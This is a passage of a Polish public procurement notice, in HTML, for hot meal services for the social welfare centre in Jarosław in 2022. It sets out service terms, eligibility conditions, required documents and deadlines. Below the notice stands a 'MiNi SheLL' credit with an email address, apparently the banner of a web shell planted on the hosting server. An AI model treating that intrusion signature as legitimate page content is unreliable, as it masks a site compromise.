zakresie wykonywanej usługi, w tym m.in. w zakresie jakości produktów i przygotowania posiłków <br/>w zakresie wymagań higieniczno - sanitarnych,<br/>4) Jeżeli w trakcie trwania Umowy w miejscu jej wykonywania obowiązywał będzie stan epidemii, stan zagrożenia epidemicznego lub stan nadzwyczajny, Wykonawca obowiązany będzie do wdrożenia określonych dla jego branży wytycznych zapobiegających zakażeniu wirusem SARS-CoV 2.<br/>Wykonawca przedkłada jadłospis na następny miesiąc w siedzibie Miejskiego Ośrodka Pomocy Społecznej w Jarosławiu z tygodniowym wyprzedzeniem W celu jego akceptacji. Zamawiający przekaże Wykonawcy listę osób uprawnionych do odbioru jednego ciepłego posiłku w ciągu dnia. Lista zostanie przekazany Wykonawcy najpóźniej na 3 dni przed końcem miesiąca. W przypadku aktualizacji listy informacja ta będzie przekazywana Wykonawcy do godz. 10 dnia następnego.<br/>Wykonawca zobowiązany jest do prowadzenia ewidencji wydanych posiłków, zawierającej informację o liczbie wydanych posiłków w ciągu danego miesiąca wraz z czytelnym podpisem osoby korzystającej z posiłku.<br/>Zamawiający nie ponosi odpowiedzialności za żadne szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.<br/>Cena oferty powinna uwzględniać wszelkie koszty związane z wykonaniem przedmiotu umowy. Oferta powinna uwzględniać w szczególności następujące koszty: zakup produktów niezbędnych do realizacji przedmiotu zamówienia, ewentualnych kosztów utrzymania lokali w których przygotowywane i wydawane będą posiłki, koszty zatrudnienia odpowiedniej kadry.<br/>W przygotowanej ofercie należy podać koszt przygotowania i wydania jednego gorącego posiłku w kwocie netto i brutto oraz kwotę ogółem netto i brutto (obliczoną jako iloczyn stawki za jeden posiłek oraz przewidywanej do zamówienia ilości posiłków, określonej <br/>w IWZ.<br/><br/>Wykonawca zobowiązany będzie podczas realizacji umowy do zapewnienia dostępności architektonicznej i/lub informacyjno-komunikacyjnej osobom ze szczególnymi potrzebami na poziomie minimalnych wymagań, określonych w art. 6-7 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2020 r. poz. 1062) oraz wykazania w ofercie konkretnych działań w tym zakresie.<br/><br/>Wszelkie koszty sporządzenia oferty niezależnie od wyników niniejszego postępowania ponosi Oferent. Zamawiający nie odpowiada za koszty poniesione przez Oferentów w związku z przygotowaniem i złożeniem oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.1.	zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>2.2.1.	aktualne (wydane nie wcześniej niż 30 dni przed dniem złożenia oferty) zaświadczenie o wpisie do rejestru zakładów, o których mowa w art. 61 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia. (t.j. Dz. U. z 2020 r. poz. 2021) wydane przez Państwowego Powiatowego Inspektora Sanitarnego w zakresie działalności objętej niniejszym postępowaniem. - (część 1-2)<br/><br/>2.3.	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunku<br/>2.4.	zdolności technicznej lub zawodowej<br/><br/>1)	posiada niezbędną wiedzą i doświadczenie:<br/>a.	Zamawiający wymaga, aby Wykonawca wykazał, że wykonał należycie<br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy — w tym okresie, co najmniej 2 usługi (jak zamówienie w sprawie) dla składanej części zamówienia; <br/>w przypadku składania oferty na co najmniej dwie części zamówienia wystarczającym będzie wykazanie się świadczeniem 2 usług dla którejkolwiek z części zamówienia, - (część 1-2)<br/>Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez wykonawców usługi zostały wykonane lub są wykonywane należycie, zawierały, co najmniej:<br/>a)	wskazanie, że wykonawca składający ofertę w niniejszym postępowaniu realizował usługi, których dokumenty dotyczą,<br/>b)	wskazanie podmiotu, na rzecz którego usługi zostały wykonane,<br/>c)	wskazanie wartości i przedmiotu usługi wskazanie daty wykonania (rozpoczęcia i zakończenia). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.1. oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 uPzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>1.2. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 uPzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz usług będących przedmiotem zamówienia <br/>2. aktualne (wydane nie wcześniej niż 30 dni przed dniem złożenia oferty) zaświadczenie o wpisie do rejestru zakładów, o których mowa w art. 61 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia. (t.j. Dz. U. z 2020 r. poz. 2021) wydane przez Państwowego Powiatowego Inspektora Sanitarnego w zakresie działalności objętej niniejszym postępowaniem. - (część 1-2)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do Oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VII pkt 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-21 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/um_jaroslaw pod nazwą niniejszego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-21 11:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com